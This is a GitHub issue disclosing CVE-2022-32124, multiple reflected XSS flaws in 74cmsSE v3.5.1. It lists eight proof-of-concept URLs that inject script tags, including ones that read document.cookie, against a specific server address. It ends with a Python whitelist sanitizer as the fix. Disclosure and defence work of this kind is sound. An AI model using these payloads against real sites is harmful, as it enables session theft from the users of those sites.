CVE-2022-32124: There are multiple reflective XSS vulnerabilities in this cms · Issue #3 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading
74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.
Vulnerability name: Reflected XSS
Date of Discovery: 30/5/2022
Affected version: 74cmsSE_v3.5.1
Download link: http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
The attacker-controlled string is supplied as part of a crafted URI or HTTP parameter, is neither filtered nor encoded by the application, and is echoed back into the page returned to the victim, whose browser then executes it.
Vulnerability location: many places. Here are some of the ones I found:
Verification process:
1. exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
2. exp: http://124.223.95.129:8766/job/?"<ScRiPt>alert(“xss”);<%2FScRiPt>"=11
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
3. exp: http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
4. exp: http://124.223.95.129:8766/company/view_be_browsed/total/d1/_d1_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
5. exp: http://124.223.95.129:8766/company/service/increment/add/im/d1/_d1_/d2/_d2_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
6. exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
7. exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
8. exp: http://124.223.95.129:8766/company/down_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page
   The following screenshot shows the injected JS code executing, which proves the reflected XSS.
Repair method:
Filter the data against a whitelist of allowed tags and attributes so that executable script is removed (e.g. the script tag, the onerror attribute of the img tag, etc.).
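An added example of that repair, not the project's own code (74cms is PHP; this is a Python sketch of the same whitelist approach, and the allow-lists are assumptions): tags outside the allow-list are dropped, script and style bodies are discarded, and everything that survives is entity-encoded. For the reflection points in this report that should never contain markup at all (the page title and echoed query-parameter names), plain encoding via escape_for_html is the simpler fix.

```python
from html import escape
from html.parser import HTMLParser
# Illustrative defence, not 74cms code; the allow-lists below are assumptions.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_CONTENT = {"script", "style"}      # their bodies are discarded outright
URL_SCHEMES = ("http://", "https://")   # href must be a plain http(s) link

class WhitelistSanitizer(HTMLParser):
    # Rebuilds markup keeping only allow-listed tags and attributes;
    # every text run and attribute value is entity-encoded on the way out.
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):  # names arrive lower-cased
        if tag in DROP_CONTENT:
            self._drop_depth += 1
            return
        if tag not in ALLOWED_TAGS or self._drop_depth:
            return  # unknown tag vanishes; its inner text is still emitted, escaped
        rendered = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # event-handler attributes such as onerror never survive
            if name == "href" and not (value or "").strip().lower().startswith(URL_SCHEMES):
                continue
            rendered.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(rendered)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._drop_depth = max(0, self._drop_depth - 1)
        elif tag in ALLOWED_TAGS and tag != "br" and not self._drop_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=True))

def sanitize_html(untrusted: str) -> str:
    # Whitelist-filtered markup that is safe to place in an HTML body.
    p = WhitelistSanitizer()
    p.feed(untrusted)
    p.close()
    return "".join(p.out)

def escape_for_html(untrusted: str) -> str:
    # For sinks that must never carry markup (titles, echoed parameters): encode everything.
    return escape(untrusted, quote=True)
```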